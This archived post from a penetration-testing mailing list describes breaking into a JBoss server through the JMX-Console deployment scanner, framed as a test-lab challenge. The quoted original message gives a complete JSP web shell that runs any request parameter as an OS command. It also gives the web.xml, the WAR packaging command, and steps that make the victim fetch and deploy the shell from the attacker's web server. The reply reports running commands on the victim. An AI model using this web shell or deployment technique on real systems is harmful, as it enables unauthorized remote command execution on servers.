Re: breaking jboss with a browser? not happening

[lazers <a.alii85 () gmail com>]

Hey guys i'm back and want to greet you with a happy news:) i finally break
the jboss scannerdeployment mystery. Yes i was able to upload cmd.jar fille
access it and then sent remote commands to it under-laying operating system
which was linux:)

But this is not half as interesting then what im about to tell you. How i
broke the jboss mystery has nothing to do with the attack code tweaking and
changing any setting at jmx-console / server side the entire crux of the
problem was right at the client side ; meaning my so-called webserver was
not actually acting itself as web-server the thing which i took most lightly
was my choice of web-server first i started with the apache httpd server
then i realize that bare-born version of apache tomcat doesn't not support
php then i switched over wamp server. I thought my problems were solved ;
but no so wamp has interesting installation ; after installing wamp it could
be quickly started by right clicking on the icon at the task bar and
clicking start all services. It turn to green and on the surface it looks
all is well; but no be so quick...as i soon found out; when i try linking
the file cmd.war with green but(but offline settings) it has the following
effect  i'm able to access the file on the exposed server ...exposed
server:9090/cmd/cmd.jsp but the file was read as it was uploaded line by
line without compiling like when i access the above url i could see the
contents of original code with in text and ascii format and also at places
with symbols like heart and spades shaped.

Basically what it did that the file was uploaded as it was without actually
doing anything to it ... wamp server was not letting the victim server
(jboss) to identify the file with correct header/footer like jboss was
loading the file as ordinary file not as executable. The only different
thing it was doing that it extract the war file and extract cmd.jsp file but
it never executed it .....if it has i would be able to access the actual
front end of the apps not the code?

As it says that curiosity gets the best of cat ; same happened in my case
like when i viewed server settings while i was still banging my head onto my
LCD screen i realized that why im having the wamp server run in an offline
mode and not in a online mode? interesting isn't it even when the color is
green it still showed it as offline. All it meant for me that perhaps not
all services which are needed by the wamp server are active ; and perhaps
their activity is crucial in correct compiling or executing so i started all
on a whole new journey on how to make the bloody thing turn to online. As
soon as i turn it to online it pop up some error i threw that error word by
word to google (my best friend forever) it brought me like zillions forums /
thread where geeks are crying their @ss on the same issue. After a quick
scan and i started doing the traditional test and eliminate strategy the
most common reason for this error was like other services (mysql,previous
webserves,databases,iis or even skype) which might be using services and
ports needed by wamp.... i went to windows components in add remove section
and re-disabled the iis server went to firewall settings and remove services
(e.g one note and yes i removed msn too) after that i removed wamp server i
did a fresh installation and voila my wamp server was not only running green
but it said ONLINE for the first time. I knew at once that something magical
had happen now....i remembered Hembrow, Chris J saying that you should test
with html file to eliminate chances of errors in compilation. So i went to
front page and put in body "testing" i archived the file as war and put in
wamp www directory. I pointed the victim server to point to the new
archive....i now tried to access the file and VOILA i could see the file
test.htm displaying text (TESTING) i knew if this could happen then so can
the actual code i started with. I immediately went back to the basic code
and write the .xml file and cmd.jsp file jar it and pointed the victim
server to my newly prepared jar file cmd.jar ...i went to the browser
address bar and access the file victimserver:9090/cmd/cmd.jsp?id=id...as
soon i hit that url i was jumped of my seat and start doing my happy dance i
finally had the jboss compiled and executed my code as it should. Like i was
welcomed by the input box and a button which says command i was able to
execute arbitary commands with ease and i tested with
(ls,ping,arp,arch,ps,hostname,route and etc) commands.

i LOVE to have you expert have their own take on what was the reason for
success why it not worked 1000 times before and this time it did? are you
thinking differently from my perspective i blaming and hating web server
justified ...are you guys baffled like me? or it was stupid like of
observation and common sense on my behalf. 












lazers wrote:
> I have been given task to break into jboss application by my senior sec
> manager at my company. 
> Its a hacking challenge staged in a test lab This is what i have been
> given. A web-access to jboss.
> Yes that pretty much it<3. He believes in less is more philosophy. With
> some get to start working info. I have been told that a vulnerability
> exists inthe application and its no 0 day exploit its an known
> vulnerability.It is set as an open-book challenge i can get help anywhere
> i like. So what i did so for?
>
>
> Yes i google ; but i also run a nessus scan and the scan brought me one
> HIGH vulnerability. Its has to do with the default Jboss installation
> using the JMX-Console. Its not a new vulnerability i was able to reach
> this conclusion as i start googling. This particular vulnerability is very
> popular; I was saying to myself that my problems are over and i would be
> break it into jboss in record time. But that has been largely un-true.
> Why? Well if it wasn't true i wouldn't be  here. I did the following (in
> steps) 
>  
>
> attack vector: deployment scanner feature
>
>  
>
>  
>
> 1.confirmed the default installation (by accessing localhost:9090) in my
> case its
>
> 9090 not 8080 as in hacking literature. Probably this is because em using
> a new version (idk exact reason)
>
>  
>
> 2.i wrote this jsp script(cmd.jsp) astold in sites.
>
> <%@ page import="java.util.*,java.io.*"%>
>
> <%
>
> %>
>
> <HTML><BODY>
>
> Commands with JSP
>
> <FORM METHOD="GET" NAME="myform"ACTION="">
>
> <INPUT TYPE="text" NAME="cmd">
>
> <INPUT TYPE="submit" VALUE="Send">
>
> </FORM>
>
> <pre>
>
> <%
>
> if (request.getParameter("cmd") != null) {
>
> out.println("Command: " + request.getParameter("cmd") +"<BR>");
>
> Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));
>
> OutputStream os = p.getOutputStream();
>
> InputStream in = p.getInputStream();
>
> DataInputStream dis = new DataInputStream(in);
>
> String disr = dis.readLine();
>
> while ( disr != null ) {
>
> out.println(disr);
>
> disr = dis.readLine();
>
> }
>
> }
>
> %>
>
> </pre>
>
> </BODY></HTML>
>
>  
>
> 3.next i create a web.xml file to be placed in WEB-INF folder
>
>  
>
> <?xml version="1.0" ?>
>
> <web-app xmlns="http://java.sun.com/xml/ns/j2ee";
>
> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
>
> xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
>
> http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd";
>
> version="2.4">
>
> <servlet>
>
> <servlet-name>Command</servlet-name>
>
> <jsp-file>/cmd.jsp</jsp-file>
>
> </servlet>
>
> </web-app>
>
>  
>
> 4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF
> folder
>
>  
>
> jar cvf cmd.war WEB-INF cmd.jsp
>
>  
>
> 5. I put this file in http-apache server. File cmd.war reside at htdocs
> folder. Can be accessed by url: mywebserver:80/cmd.war
>
>  
>
> 6.i go back to jboss defualt page and navigate myself to
> jboss.deploymentpage.
>
>  
>
> 7. in the addurl tab i enter path for my cmd.war file as
>
> http://mywebserver/cmd.war
>
>  
>
> 8. next i goto victim webserver in attempt to access my uploaded
> application http://victim:9090/cmd/cmd.jsp
>
>  
>
> 9. i get HTTP STATUS 404- /cmd/cmd.jsp
>
>  
>
> my app is suppose to be hot deployed by the jboss; but this is not the
> case coz even after 10-20 times after u have access the file i get the
> same error page. I want to know what is the reason for the behavior. I
> know there exists other attack vector (e.g rmi and etc) but i want to
> stick to this until i don't figure out the reason for this failure of
> exploit.
>
>  
>
> Em i compiling the .jsp file with incorrect syntax? do i need to have
> tomcat server installed instead? I read it on internet that there could be
> some problems in the jboss trying to get reverse shell on your web-server
> as jboss is it work in bind-shell mode only? I'm really clueless to what i
> happening i spent 12 works on this single attack vector but em not making
> head-ways.
>
>  
>
> jboss gurus help me.
>
>  
>
> thanks

-- 
View this message in context: 
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30732175.html
Sent from the Penetration Testing mailing list archive at Nabble.com.


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------